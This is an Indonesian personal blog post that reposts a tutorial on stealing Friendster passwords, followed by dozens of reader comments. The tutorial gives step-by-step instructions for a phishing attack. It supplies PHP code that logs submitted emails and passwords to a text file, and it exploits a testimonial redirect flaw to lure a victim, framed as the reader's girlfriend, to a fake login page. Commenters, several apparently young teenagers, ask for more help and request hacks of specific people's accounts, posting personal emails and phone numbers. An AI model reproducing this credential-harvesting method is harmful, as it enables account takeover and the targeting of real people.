Yudhi'm Blog

Blog yang berisi berbagai macam tulisan & tutorial umum. Enjoy the blog here!!!

Banner Iklan1

Banner Iklan1
Sudahkah keluarga Anda terlindungi?

Banner Iklan

Banner Iklan
970x90

Cara MengHack Friendster

Hola,,,

Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya. akhirnya saya memutuskan untuk mencari artikel tentang cara menghacking password Friendster karena banyak teman - teman saya yang menyarankan untuk memasukan artikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search engine segala. dan setelah goggling sejenak akhirnya saya dapat juga di jasakom.com. nah ini dia selamat membaca. GBU

Penerapan Social Engineering untuk mendapatkan password di Friendster
Date: Wednesday, February 14, 2007 Hits: 14195 By: numpang_lewat
Artikel ini ditujukan bahwa ” Hacking tidak selamanya menggunakan TOOLS “. So bagi para 3133t sebaiknya tidak membaca ARTIKEL ini jika anda tidak ingin mual, perut kembung, bibir pecah2, kepala senut2.. dll.

Artikel ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social Engineering….

Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruskan saya tidak bisa memaksa anda…

Lanjutt ….

Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;)) n laen-laen .. .

So langsung saja kita menuju acara puncak …

Pertama-tama yg mesti kita siapin :

1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.

$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>



Dan upload file diatas ke www.webyangsupportphp.com

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

hai syang .. gimna kabarna, kagen nie ..

nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta… =] :))

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Kesimpulan :

# Hacking tidak selamanya menggunakan ” TOOLS “
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

Thanks To :

Allah SWT
———


$Jasakom Community
$Aat Shadewa - thanks 4 your knowledge.
Bagikan :
+
Previous
Next Post »
57 Komentar untuk "Cara MengHack Friendster"
Anonymous
delete

mas cara untuk buat webcounter di blogger gimana caranya

Thank's

Anonymous
delete

klo kamu mau buat web counter gampang qo!!kmu klik aja ini http://www.webcounter.com/ dan kmu ikuti instruksi selanjutnya.klo kmu ga bs juga bru kmu tanya lgi ya???thnks too

lagi2 fs,, dah lah kasian uh dya..

ini web mang memunkinkan testi yg bisa input script di dalemnya..
ya jelas ja banyak kelemahannya lah..

coba nih hack lewat comment blogger yg cuman bisa 'bbrapa' tag HTML doang ?? bisa !??

Anonymous
delete

maz tolong q...
q abiz di kerjain m temenq hancurin fs q
q pgn blaez dia
bisa jelasin lebih rinci gak..
q bener-bener tersiksa gara2 ini
pliz

Anonymous
delete

maz maksudnya

4. Upload file index.htm (ada di source).

apa

source itu apa......

jangan kaget q masih umur13 thn soalna jadi gtw itu maksudnya

untuk anonim kalo kamu mw belajar tntg cara menghack FS kamu klik aja ini www.yogyafree.net n kmu disana bs belajar bnyk bgt tntg hack coz aku ga bs smp bntu trlalu jauh aku cuma bntu kamu gni aja yah??untuk lebih lnjutnya kmu blajr dri website itu aja.tar klo ada yang ga ngrti bru kmu tny aku lg yah??thnks


untuk aziz untuk source itu adalh code untuk menghack FS kmu hrus pny website dlu.kmu dftar grtis dlu aja di www.geocities.com or www.googlepages.com.key??mksh ats kunjungannya.

Anonymous
delete

klo blog ga boleh ta...

masa haruz website

untuk aziz ywdh nnti aku cariin cara hack FS yg lbih simple.key??ditunggu aja

Anonymous
delete

boz..gw kan da ada web ndiri.
gw bkin di www.bravenet.com

nah yg no 4 itu gw cari mananya??
trs yg di no 5..FOrm Login maksodnya apa??

tq ya..
ditunggu balasannya

om ada cara hack sistem gak tolong bantuanya,y
johanbintang.blogspot.com(tp msh hancur)

mas maksudna file index.htm yang mana mas . .trus, minta detailnya mas . .

eh mas, ntar emang kalo dah bisa ngehack fsnya bisa diapain aja??

maklum saya wong deso .. .

katrok . .

nuwun mas . . .

sbnarnya bnyk yang bsa kita lakukan trhadap FS saya hanya bisa mendapatkan password n emailnya dan juga mengacak2 profilenya.

Anonymous
delete

yups.. dgn tutorial kyk gini ngajarin qt spy lbh hati2... Mungkin sbulan lalu, gw search2 page fs.. asalnya mnarik, tp tiba2.. dia redirect ke form login.. But, tentu aja bodoh klo gw tertipu..(jelas2 address-nya beda bgt). Mungkin targetnya cmn 1 org, cmn org2 yg lewat situ pasti kna juga kan... so waspadalah...

Anonymous
delete

assalamualaikum....

makasih ya buat informasinya

tpi bisa minta di pandu ga???

ini alamat email ana " c4no161@yahoo.com"

makasih ya...
assalamualaikum....

Anonymous
delete

haloo
saayaa salaa satuu penggemar friendster.
keliatannya kaloo sayaa gaa bisa ngehack kan norak
minta detailnya donk
inii alamat email qu

akuu_lafd_biruzh@yahoo.co.id

ada orang sok keren ngehack fsku... sial... dia pake beginian tohhh

Anonymous
delete

thx for information`a ya !

maz, blh tnya ???
yg kta`a "Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!."
mkzd`a nma`a yg $fl itu ?? pa yg fopen ??? sma CHMOD paan ya ???

mav, bnyak tnnya cuz, msh 12 th .. ! :D

Anonymous
delete

Berarti intinya kita membuat form login ya bos???. trus di-upload trus alamat url juga biar menipu kita pake http://www.friendster.co.cc atau apalah yang penting bisa mengelabui the victim..,

Anonymous
delete

yud,gw pgn nanya cara ngehack liveconnector,coz gw paling benci klo ada chat yg ga sopan (pake nicknamenya or picknya)???thank's before yud..

wah klo untuk mengahack live connector lum blajar neh..he4x

assalamu'alaikum..
luar biasa infonya..bolehkah saya copas..

Anonymous
delete

hai bro,...pagi-pagi dah OL lo,...
heheheheheh....lumayan mas blog nt,...eh ada beberapa script yg nt kopi ya,.///// heheheheh...link hubungi saya itu nt dapet dr mana??? kaya website sekolah yang dbikin temen ane....
btw tuto hacknya dah lengkap tu yud,...???
awas lo ane coba kage isa???!!!!
heheheheh

peace mas.....


fs: why_phy

mksdnya link apa ya??ane jdi bgung,,

insya allah berhasil qo coz udh ane coba..

he,..

Anonymous
delete

ikutan gabung donk...!!
lam knl y, gw ovik..gw mw tanya nihh..

yang di no.3 (web hosting yg support PHP) itu mksd'y gmn??
- web hosting itu apa?
- support PHP itu apa??

hhahaha ma'lum gw itu orangnya katro..
mohon balasannya y mas..
thnx

Anonymous
delete

yg di no.5 (Dan upload file diatas ke www.webyangsupportphp.com) itu mksd'y file apaan c....??

truz stlah gw bka www.webyangsupportphp.com nah dstu bnyk pilihannya,,kira2 gw pilih yg mn tuhh??

Anonymous
delete

file yg mn??

trus yg no 5 itu code apaan???code bwt ngehack bkn??


truz klo sudah di apload k ripway... slanjutnya gmn??


mohon penjelasannya y...

Anonymous
delete

no.6 CHMOD itu apa?

(CHMOD di gnti sesuai dngan kbutuhan kamu) mksd'y gmn ???tlng contohin dong...

hhehehe ma'lum gw itu wong katro,,jd bnyk nnya... maaf y... hhehe

Anonymous
delete

=))
gitu ae ga tau.....
saia tambah temen ga taunya !!! wakkawkawk

Anonymous
delete

fs gw error ne n gw lupa password, klo ada yg bisa buka fs q dg alamat ayam@terkenal.com tolong gantiin dengan alamat emailnya menajdi isenkdoank@rocketmail.com dgan password barunya ya..

klo ada yg bsa ditunggu alamt fs baru q n passwor baru q d email isenkdoank@rocketmail.com
thankz..

Anonymous
delete

ywdh tar gw add YM nya... mnx apa nm YM nya...?

Anonymous
delete

:x :-*

Anonymous
delete

kk..!!
saya RadiT..!!
anak Surabaya..!!
minat bantuannya doNg..!!
"computer saya donlod Microsoft world yang palsu"..!!
n si komputer minta yang asli..!!
"namanya aja orang masih SMA, beli Software orsi masih ngotot"... hehhee..
tq yach, mas..!!
moga bias replay di e-mail aq..!!

Chuky_ngkmati@yahoo.com

mohon elpnya kk..!!

bos contoh web yg support php tu apa y ???:D

Anonymous
delete

oM,pLiz cRiin password friendster saya aLamatnya
crew_bania@yahoo.com
pLizz om,kLo dh tw kRm SMS ke 081318226047 ya....
coz saya udah cRi paswordnya Tp tTp gX tw
pLizzz om...!!:((

Anonymous
delete

cpt ya om....

Anonymous
delete

oMz ... LeH JeLaZin LbiH RiNchie Gax ??

Coz .. aQ ga ngeRTie NeYz ...

ToLong KiRiMz ke valvoline_the_hacker@yahoo.co.id

pLease ...

Anonymous
delete

ada yg tau caranya ngehack ID RF??? please kl tw sms q di 081331280888 ;)

Anonymous
delete

kalo wehosting yang support PHP pake aja www.000webhost.com n domainnya pake aja www.co.cc......
Ada yang pengen dapet duit, kunjungi www.ianmedia.co.cc

walah dalah,,org indo kyny g kreatif" y....
nulis d blog ndri kox cuma copas...
alias copy paste....

rata" smw yg gw cek ttg hal ne...
bahasany sama,,jumlah tulisan,,sama...

fuht...

g kreatig....

anu , mas ..
cara ngisi di webhostingnya pegimane ya?

belajar dari mana neh bikin blog kaya gni,, ajarin dunkzz...
salam kenal bro..
mampir juga k blog ane ;)..

Anonymous
delete

msh blm jelas caranya bwt web n cara menghack pass FS

Anonymous
delete

tlg hackin pass email FS ini,coz dy blg m sk m aq...tp aq cm pgn ngetes aja...ap bnr dy sk m aq?
iva_2705@yahoo.com n http://profiles.friendster.com/39298354 (cz aq g tau almt emailna, jd cuma URLna aja)

thx b4. tlg kirim ke email squal_46@yahoo.com

Anonymous
delete

dhim... mkasih yo !

Anonymous
delete

ngambil dr mn mas??
kok sama dgn tetangga sebelah..
:P

Anonymous
delete

mas...mas....
mnta tlong sih,fs saya di hack,gmna cra ngmbliin'a ? :((

Anonymous
delete

wah2 ni ndak da yg lebih ringkas n lebih umum nih kata2nya,

q cemuanya ngag ngerti ~x(

Anonymous
delete

basiiiiiiiiiiiiiiiiiiiiiiiiiiiii, mna java script x? g ada gitu :)) tlusin g lngkap!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! by www.DokterMatrix.Com

Anonymous
delete

mas caranya menghack FS>>>> kalao kita lupa psword FS dan lupa juga pasword emailenya bagaimana??????

Trims atas bantuannya!!!!!

tolong kirim ke sini.....
emile: adi_sba22@yahoo.co.id

Anonymous
delete

mas,aq mw nnya nii,klo kita lupa password nd email fs gmna cara nyari nyaaa ?
tolng kirim k email ku iaaa,pleaseeeeeeee !!

exotic_planet@yahoo.co.id

Anonymous
delete

bos tolongin aku!!!

email :
df_smg@yahoo.co.id

q tunggu blasan u!!
sumpah aq pengen tahu caranya!!

Boleh juga tuh

Gmana kalo cara yang ini mungkin lebih mudah
Silakan buka website saya:
http://cri-cam.blogspot.com/2009/04/cara-mengehack-friendster-facebook-dan.html

Anonymous
delete

mas cara ngehack facebook gmn??

mas tlong bntu sya ... friendster saya selalu mnta login ...sepeti artikel di atas .. bagaimana cara penanggulangan nya .. pliss mohon di bantu karena statys saya sebagai user .. dan gak bsa hapus fto .... kirim ke email ja mas .... reaven_ardy@yahoo.com ,,,,thanks

Anonymous
delete

mas tlong,ada yg lbih rinci lg g?
klo bisa caranya di buat file document yg lbih rinci n bisa di download.
jd bisa lbih memahami.
maklum lg bljr..
thanks before.

Informasi Pilihan Identitas:
Google/Blogger : Khusus yang punya Account Blogger.
Lainnya : Jika tidak punya account blogger namun punya alamat Blog atau Website.
Anonim : Jika tidak ingin mempublikasikan profile anda (tidak disarankan).

 
Template By Kunci Dunia
Back To Top